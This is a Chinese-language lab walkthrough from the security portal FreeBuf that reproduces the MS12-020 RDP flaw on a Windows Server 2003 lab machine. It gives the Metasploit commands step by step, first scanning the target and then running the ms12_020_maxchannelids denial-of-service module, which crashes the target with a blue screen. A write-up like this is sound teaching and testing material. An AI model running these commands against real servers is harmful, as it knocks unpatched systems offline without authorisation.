微软MS12-020漏洞复现 - FreeBuf网络安全行业门户

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序把安全装进口袋

微软MS12-020漏洞复现

2023-03-06 21:00:58

所属地湖北省

本文由创作，已纳入「FreeBuf原创奖励计划」，未授权禁止转载

一、实验环境

windows server 2003（受害方）

kali linux（攻击方）

二、实验步骤

1.输入nmap -R 192.168.1.3可以看到目标服务器上开启了3389服务。

1678105473_6405db81ab2feb495c73b.png!small

2.输入msfconsole命令，启动msf。

1678106566_6405dfc6c6330f1523986.png!small

3. 输入search ms12-020查找该漏洞攻击脚本。

1678106683_6405e03b3aefff672748d.png!small

4.使用ms12-020检测脚本，输入use auxiliary/scanner/rdp/ms12_020_check，输入show options查看设置。

1678106745_6405e07994ed951289740.png!small

5.输入set rhosts 192.168.1.3设置目标，输入run运行，可以看到存在这个漏洞。

1678106807_6405e0b79e80070a0a193.png!small

6.输入use auxiliary/dos/windows/rdp/ms12_020_maxchannelids使用dos脚本，输入show options查看设置。

1678106920_6405e1284606a4dc35926.png!small

7.输入set rhosts 192.168.1.3设置目标，输入run运行，可以看到攻击成功，目标机器蓝屏后自动重启。

1678107011_6405e1835433f8ed3186c.png!small

1678106989_6405e16dc438f151f280e.png!small

# 微软漏洞 # 漏洞复现 # Windows系统安全

已在FreeBuf发表 0 篇文章

本文为独立观点，未经允许不得转载，授权请联系FreeBuf客服小蜜蜂，微信：freebee2022

被以下专辑收录，发现更多精彩内容

+ 收入我的专辑

+ 加入我的收藏

展开更多